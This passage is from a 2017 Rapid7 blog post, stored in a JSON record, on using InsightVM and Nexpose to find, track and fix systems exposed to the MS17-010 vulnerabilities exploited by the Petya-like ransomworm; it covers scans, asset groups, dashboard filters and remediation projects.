rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" 
rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan to identify all assets with MS17-010.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67235/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67235/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67236/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 
2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67236/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities. </span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here’s </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" 
href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.  To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: 'courier new', courier;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. 
To do this, go to the “Projects” tab and click “Create a Project”:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 
11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you’ll be able to quickly scan for the vulnerabilities leveraged by this ransomworm. If you have any questions please don’t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:736fb2f2-6580-4bdc-908e-ca4c7c801548] -->", "modified": "2017-06-28T00:06:12", "published": "2017-06-28T00:06:12", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/protecting-against-petya-like-ransom-worm-with-insightvm-and-nexpose", "id": "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "title": "Petya-like 
ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "type": "rapid7community", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}